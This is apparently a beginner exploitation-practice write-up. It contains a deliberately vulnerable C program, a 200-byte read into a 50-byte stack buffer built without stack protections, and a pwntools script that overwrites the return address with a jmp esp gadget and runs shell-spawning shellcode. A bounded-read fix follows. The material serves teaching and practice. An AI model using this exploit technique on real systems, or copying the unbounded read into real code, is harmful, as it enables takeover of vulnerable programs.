A practice challenge for junior students; working through it introduces some basic concepts.
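#include <stdio.h>
#include <unistd.h>

/* Forward declarations: both functions are defined after main(). */
void welcome(void);
void get_contents(void);

int main()
{
    char name[40];

    welcome();
    printf("enter your name\n");
    read(STDIN_FILENO, name, 40);
    name[39] = '\x00';
    get_contents();
    return 0;
}

void welcome(void)
{
    printf("welcome to play the game!\n");
}

void get_contents(void)
{
    char contents[50];

    puts("enter the contents you want to save:");
    /* Intentional bug: reads up to 200 bytes into a 50-byte stack buffer. */
    read(STDIN_FILENO, contents, 200);
}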
Compiler flags
-fno-stack-protector -z execstack -m32
The challenge is the simplest possible case, so I will not analyze it in depth; the exploit is given directly below.
from pwn import *

context(os='linux', arch='x86')
#context.log_level='debug'

# 0x80485e3 : jmp esp
# offset: 66
jmp_esp = 0x80485e3

p = process('./a.out')
#gdb.attach(p)
p.sendlineafter(b'name\n', b'a')
p.sendlineafter(b'save:\n', b'a'*62 + p32(jmp_esp) + asm(shellcraft.sh()))
p.interactive()
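The root cause is that get_contents() reads 200 bytes into a 50-byte buffer. As an added example (not part of the original post), here is a bounded version in which the read length is derived from the buffer size; read_bounded, get_contents_fixed and stored_from_input are hypothetical names, and the input is constructed filler fed through a pipe.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define CONTENTS_SIZE 50   /* same buffer size as the challenge */

/* Read at most cap-1 bytes from fd into buf and NUL-terminate it.
 * Returns the number of bytes stored, or -1 on error. */
ssize_t read_bounded(int fd, char *buf, size_t cap)
{
    ssize_t n;
    if (buf == NULL || cap == 0) return -1;
    do {
        n = read(fd, buf, cap - 1);   /* bound comes from the buffer, not a constant */
    } while (n < 0 && errno == EINTR);
    buf[n < 0 ? 0 : n] = '\0';
    return n;
}

/* Hypothetical hardened get_contents(); fd is a parameter so it can be exercised. */
ssize_t get_contents_fixed(int fd)
{
    char contents[CONTENTS_SIZE];
    puts("enter the contents you want to save:");
    return read_bounded(fd, contents, sizeof contents);
}

/* Constructed input: feed len filler bytes through a pipe, report how many were stored. */
ssize_t stored_from_input(size_t len)
{
    int fds[2];
    char filler[256];
    if (len > sizeof filler || pipe(fds) != 0)
        return -1;
    memset(filler, 'a', len);
    ssize_t w = write(fds[1], filler, len);
    close(fds[1]);                    /* reader sees EOF after the data */
    ssize_t n = (w == (ssize_t)len) ? get_contents_fixed(fds[0]) : -1;
    close(fds[0]);
    return n;
}

int main(void)
{
    printf("200 bytes offered, %zd stored\n", stored_from_input(200));
    return 0;
}
```

Building without -fno-stack-protector and -z execstack additionally restores the stack canary and the non-executable stack that the challenge build turns off.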
Original: http://www.cnblogs.com/junmoxiao/p/5931170.html